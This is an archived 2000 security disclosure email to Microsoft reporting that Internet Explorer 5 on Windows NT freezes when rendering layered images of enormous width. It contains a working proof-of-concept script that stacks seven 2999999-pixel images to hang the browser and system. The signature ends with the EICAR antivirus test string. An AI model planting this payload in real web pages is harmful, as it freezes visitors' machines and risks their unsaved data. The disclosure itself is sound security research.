=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Чт, 20 янв 2000  12:28:31

   От: 3APA3A <3APA3A@SECURITY.NNOV.RU>

 Кому: secure@microsoft.com

 Тема: IE5 freezes system while output huge image

--------------------------------------------------------------------------------




Hello,



I  have reported this problem to Microsoft, but it's not eliminated in

IE5.01 so i repeat.



Reproducability:

Open  http://www.security.nnov.ru/2000/january/ie5hang.html  to  test

vulnerability (save you data before :)))



I  can  reproduce  this  bug on all PCs with Windows NT 4.0 (SP5-6a) +

IE5,  but  reaction is different. Reaction can probably depend on type

of  video  card/video driver and (possibly) mouse driver or mouse type

(COM  or  PS/2).  In  any case system freezes, but on some boxes mouse

cursor still alive.



Problem description:

It's  possible  to  freeze  operation system for a long amount of time

with  100%  CPU  usage  and  almost  without  reaction  to  user input

(including  Ctrl+Alt+Del for NT). It could be made by displaying image

with  huge  width  and height parameters. It's possible to hang system

for  a  long  time  applying  images  with  few  layers.  It's  almost

impossible to kill IE during this process.



Next html code can be used (it applies 7 layers and freezes my Celeron

333 box for a half or hour. Using javascript is not necessary):



<script>

var MS=navigator.appVersion.indexOf("MSIE");

window.isIE5 = (MS>0) && (parseInt(navigator.appVersion.substring(MS+5, MS+6)) == 5);

if(isIE5){

 alert("Lets have fun!");

 document.write("<img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute; top:1; left:1;\"><img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute; top:2; left:2;\"><img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute; top:3; left:3;\"><img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute; top:4; left:4;\"><img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute; top:5; left:5;\"><img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute; top:6; left:6;\"><img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute; top:7; left:7;\">");

}

else {

        alert("This page must be viewed with MSIE 5");

}

</script>





May  be  this is a problem of graphic subsystem, but i can't reproduce

it with different software.





         /\_/\

        { . . }     |\

+--oQQo->{ ^ }<-----+ \

|  3APA3A  U  3APA3A   }

+-------------o66o--+ /

                    |/

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*